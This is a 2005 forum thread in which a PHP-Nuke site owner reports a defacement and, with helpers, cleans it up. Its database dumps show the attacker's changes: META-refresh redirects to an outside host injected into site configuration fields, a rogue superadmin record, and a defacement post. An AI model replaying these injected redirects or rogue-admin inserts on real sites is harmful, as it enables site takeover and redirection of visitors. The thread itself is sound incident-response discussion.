HACKED with sentinal 2.2.0 installed

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

what info can i provide to help find out how this happened ?

nuke 7.4
sentinal 2.1.3

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

so far i have found my nuke_config table to look like this

-- phpMyAdmin SQL Dump
-- version 2.6.1-pl3
--

Only registered users can see links on this board!
Get registered or login to the forums!

--
-- Host: *******edited by me
-- Generation Time: Jun 06, 2005 at 07:10 AM
-- Server version: 4.0.16
-- PHP Version: 4.3.4
--
-- Database: `**********`edited by me
--

-- --------------------------------------------------------

--
-- Table structure for table `nuke_config`
--

CREATE TABLE `nuke_config` (
`sitename` varchar(255) NOT NULL default '',
`nukeurl` varchar(255) NOT NULL default '',
`site_logo` varchar(255) NOT NULL default '',
`slogan` varchar(255) NOT NULL default '',
`startdate` varchar(50) NOT NULL default '',
`adminmail` varchar(255) NOT NULL default '',
`anonpost` tinyint(1) NOT NULL default '0',
`Default_Theme` varchar(255) NOT NULL default '',
`foot1` text NOT NULL,
`foot2` text NOT NULL,
`foot3` text NOT NULL,
`commentlimit` int(9) NOT NULL default '4096',
`anonymous` varchar(255) NOT NULL default '',
`minpass` tinyint(1) NOT NULL default '5',
`pollcomm` tinyint(1) NOT NULL default '1',
`articlecomm` tinyint(1) NOT NULL default '1',
`broadcast_msg` tinyint(1) NOT NULL default '1',
`my_headlines` tinyint(1) NOT NULL default '1',
`top` int(3) NOT NULL default '10',
`storyhome` int(2) NOT NULL default '10',
`user_news` tinyint(1) NOT NULL default '1',
`oldnum` int(2) NOT NULL default '30',
`ultramode` tinyint(1) NOT NULL default '0',
`banners` tinyint(1) NOT NULL default '1',
`backend_title` varchar(255) NOT NULL default '',
`backend_language` varchar(10) NOT NULL default '',
`language` varchar(100) NOT NULL default '',
`locale` varchar(10) NOT NULL default '',
`multilingual` tinyint(1) NOT NULL default '0',
`useflags` tinyint(1) NOT NULL default '0',
`notify` tinyint(1) NOT NULL default '0',
`notify_email` varchar(255) NOT NULL default '',
`notify_subject` varchar(255) NOT NULL default '',
`notify_message` varchar(255) NOT NULL default '',
`notify_from` varchar(255) NOT NULL default '',
`moderate` tinyint(1) NOT NULL default '0',
`admingraphic` tinyint(1) NOT NULL default '1',
`httpref` tinyint(1) NOT NULL default '1',
`httprefmax` int(5) NOT NULL default '1000',
`CensorMode` tinyint(1) NOT NULL default '3',
`CensorReplace` varchar(10) NOT NULL default '',
`copyright` text NOT NULL,
`Version_Num` varchar(10) NOT NULL default '',
PRIMARY KEY (`sitename`),
FULLTEXT KEY `copyright` (`copyright`),
FULLTEXT KEY `Version_Num` (`Version_Num`)
) TYPE=MyISAM;

--
-- Dumping data for table `nuke_config`
--

INSERT INTO `nuke_config` VALUES ('<META http-equiv=refresh', '<META http-equiv=refresh', 'logo.jpg', '<META http-equiv=refresh', '<META http-equiv=refresh', '<META http-equiv=refresh', 0, 'Sand_Journey', '<META http-equiv=refresh \r\ncontent=0;URL=http://k.domaindlx.com/kayrahakan/html.html>\r\n', '<META http-equiv=refresh \r\ncontent=0;URL=http://k.domaindlx.com/kayrahakan/html.html>\r\n', '<META http-equiv=refresh \r\ncontent=0;URL=http://k.domaindlx.com/kayrahakan/html.html>\r\n', 4096, 'Anonymous', 5, 1, 1, 1, 1, 10, 10, 1, 30, 0, 1, '<META http-equiv=refresh', 'en-us', 'english', 'en_US', 0, 0, 0, 'editedmymail', 'NEWS for my site', 'Hey! You got a new submission for your site.', 'webmaster', 0, 1, 1, 500, 3, '*****', 'Web site engine code is Copyright © 2003 by <a href="http://phpnuke.org">PHP-Nuke</a>. All Rights Reserved. PHP-Nuke is Free Software released under the <a href="http://www.gnu.org">GNU/GPL license</a>. ', '7.4');e

Raven · Posted: Mon Jun 06, 2005 9:16 am

Did they add an admin into your authors table?

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

yes just found this info in nuke_authors

-- phpMyAdmin SQL Dump
-- version 2.6.1-pl3
--

Only registered users can see links on this board!
Get registered or login to the forums!

--
-- Host: localhost
-- Generation Time: Jun 06, 2005 at 08:21 AM
-- Server version: 4.0.16
-- PHP Version: 4.3.4
--
-- Database: `**`
--

-- --------------------------------------------------------

--
-- Table structure for table `nuke_authors`
--

CREATE TABLE `nuke_authors` (
`aid` varchar(25) NOT NULL default '',
`name` varchar(50) default NULL,
`url` varchar(255) NOT NULL default '',
`email` varchar(255) NOT NULL default '',
`pwd` varchar(40) default NULL,
`counter` int(11) NOT NULL default '0',
`radminarticle` tinyint(2) NOT NULL default '0',
`radmintopic` tinyint(2) NOT NULL default '0',
`radminuser` tinyint(2) NOT NULL default '0',
`radminsurvey` tinyint(2) NOT NULL default '0',
`radminlink` tinyint(2) NOT NULL default '0',
`radminfaq` tinyint(2) NOT NULL default '0',
`radmindownload` tinyint(2) NOT NULL default '0',
`radminreviews` tinyint(2) NOT NULL default '0',
`radminnewsletter` tinyint(2) NOT NULL default '0',
`radminforum` tinyint(2) NOT NULL default '0',
`radmincontent` tinyint(2) NOT NULL default '0',
`radminency` tinyint(2) NOT NULL default '0',
`radminsuper` tinyint(2) NOT NULL default '1',
`admlanguage` varchar(30) NOT NULL default '',
PRIMARY KEY (`aid`),
KEY `aid` (`aid`)
) TYPE=MyISAM;

--
-- Dumping data for table `nuke_authors`
--

INSERT INTO `nuke_authors` (`aid`, `name`, `url`, `email`, `pwd`, `counter`, `radminarticle`, `radmintopic`, `radminuser`, `radminsurvey`, `radminlink`, `radminfaq`, `radmindownload`, `radminreviews`, `radminnewsletter`, `radminforum`, `radmincontent`, `radminency`, `radminsuper`, `admlanguage`) VALUES ('kralkayra', 'God', 'http://', '', '4297f44b13955235245b2497399d7a93', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, '');

Raven · Posted: Mon Jun 06, 2005 9:23 am

Do you have the Admin and Author blocker settings turned on in your NukeSentinel(tm) Configuration?

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

thats what i am trying to remember now.....im thinking no ...i had just updated to the new version and yestarday imported info for the ip2c for usa and canada Confused

Raven · Posted: Mon Jun 06, 2005 9:38 am

Well, activate it immediately, then drop that record from the author's table and recreate your admin id/pass.

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

i can't get to my site C/P yet i need to change the "god" account they have changed this and deleted all other admin accounts...can you give me a quick DB insert ( info only ) so i can get "god acess" again for some stupid reason im not getting in my C/P probably cause im frustrated and over looking something

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

ive tried to edit the info ...username and password and its still not letting me in

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

also its sentinal 2.2.0 not 2.1.3 as stated above..

and i am in to my admin C/P now

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

Raven wrote:

Do you have the Admin and Author blocker settings turned on in your NukeSentinel(tm) Configuration?

no they were not activated but are now!! I'm such a block head Bang Head

whats the site ive seen mentioned about PC killer or info on what it is ????

is this something i should report to someone ? and if so who do i send it to ? sorry for the " newbie" type questions still learning what i can about all this

THANKS FOR BEING HERE GREATLY APPRECIATED

Raven · Posted: Mon Jun 06, 2005 9:58 am

Use phpMyAdmin and edit your author's table.

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

Raven wrote:

Well, activate it immediately, then drop that record from the author's table and recreate your admin id/pass.

should i drop the whole nuke_authors table and start that table from scratch ? (7.4 original sql )

Raven · Posted: Mon Jun 06, 2005 10:11 am

Just empty it.

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

they have also joined as a member

INSERT INTO `nuke_users` (`user_id`, `name`, `username`, `user_email`, `femail`, `user_website`, `user_avatar`, `user_regdate`, `user_icq`, `user_occ`, `user_from`, `user_interests`, `user_sig`, `user_viewemail`, `user_theme`, `user_aim`, `user_yim`, `user_msnm`, `user_password`, `storynum`, `umode`, `uorder`, `thold`, `noscore`, `bio`, `ublockon`, `ublock`, `theme`, `commentmax`, `counter`, `newsletter`, `user_posts`, `user_attachsig`, `user_rank`, `user_level`, `broadcast`, `popmeson`, `user_active`, `user_session_time`, `user_session_page`, `user_lastvisit`, `user_timezone`, `user_style`, `user_lang`, `user_dateformat`, `user_new_privmsg`, `user_unread_privmsg`, `user_last_privmsg`, `user_emailtime`, `user_allowhtml`, `user_allowbbcode`, `user_allowsmile`, `user_allowavatar`, `user_allow_pm`, `user_allow_viewonline`, `user_notify`, `user_notify_pm`, `user_popup_pm`, `user_avatar_type`, `user_sig_bbcode_uid`, `user_actkey`, `user_newpasswd`, `points`, `last_ip`)

VALUES (401, '', 'kralkayra', '', '', '', 'gallery/blank.gif', 'Jun 06, 2005', NULL, NULL, NULL, '', NULL, NULL, NULL, NULL, NULL, NULL, '4297f44b13955235245b2497399d7a93', 10, '', 0, 0, 0, '', 0, '', '', 4096, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 10, NULL, 'english', 'D M d, Y g:i a', 0, 0, 0, NULL, 1, 1, 1, 1, 1, 1, 0, 0, 0, 3, NULL, NULL, NULL, 0, '0');

Raven · Posted: Mon Jun 06, 2005 10:32 am

Delete it.

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

yup i did...why wasnt the IP listed ?

looks like all that was done was they added this info to my news module and deactivated 1 of my blocks that i reactivated :

TITLE :

<marquee><h1>Hacked by KRALKAYRA</h1></marquee></center> 

Content:

<marquee><h1>Hacked by KRALKAYRA</h1></marquee></center> 
 HACKER BY KRALKAYRA <a target='top' href='kralkayra'> 
<img border=0 src=http://kralkayrahan.sitemynet.com/logo2.gif></a>
HACKER BY KRALKAYRA
<marquee><h1>Hacked by KRALKAYRA</h1></marquee></center>

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

shouldnt the IP been logged in sentinal ?

if so, if i was to re-enter his name into the nuke_members the IP should be with the user name logged in sentinal tracked ip's right ?

TheLoneInventor · Posted: Mon Jun 06, 2005 7:16 pm

Wow, this fellow has been busy... Sorry I missed this thread Raven

mds, you can see the topic I posted about an attack from the same hacker on the 4th

Only registered users can see links on this board!
Get registered or login to the forums!

Raven · Posted: Mon Jun 06, 2005 10:41 pm

mds wrote:

shouldnt the IP been logged in sentinal ?

if so, if i was to re-enter his name into the nuke_members the IP should be with the user name logged in sentinal tracked ip's right ?

You could use phpMyAdmin and just submit a query against the nsnst_tracked_ips table for his user_id.

persona_non_grata · Joined: Posts: 0

well sorry but i had to do it...
the hacker "kayrahakan" had his shitty account at

Only registered users can see links on this board!
Get registered or login to the forums!

see in post...http://k.domaindlx.com/kayrahakan/

So i maild the host of the free stuff and they responded with..

The site has been terminated.
Regards,
Domain DLX Abuse Department

Now that was easy.

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

i ran the search twice using the user_id (401 which if he wouldve registered regularly shoudlve been 399 ....sql injection ??)
and by username (kralkayra) and both returned no results ....

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

TheLoneInventor wrote:

Wow, this fellow has been busy... Sorry I missed this thread Raven

mds, you can see the topic I posted about an attack from the same hacker on the 4th

Only registered users can see links on this board!
Get registered or login to the forums!

Thanks for the link

**Raven**
it's not much but i did send a donation . !! Thank You for everybody's help!! and this great site

TheLoneInventor · Posted: Tue Jun 07, 2005 8:18 pm

mds,

I've got the guys IPs if you want them. I picked them up with the protector system which he got through, as well as the IP tracking module, so I have an idea of where he was going as well.

68.23.169.128 - adsl-68-23-169-128.dsl.chcgil.ameritech.net
was the one last used to access my site... I notified this host of abuse, evidently and SBDC ISP out of plano texas.

65.19.134.2 - is the one I believe was used to hack the site, through the forums by the look of it. 2608 URLs were hit by this IP from the kralkayra username.

Hope that helps.

mds · Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

excellent

that IP looks very familiar to me ...i think i seen it in my access logs but didnt show them as accessing any admin files...guess i better go back and have a better looky see Smile

thank you again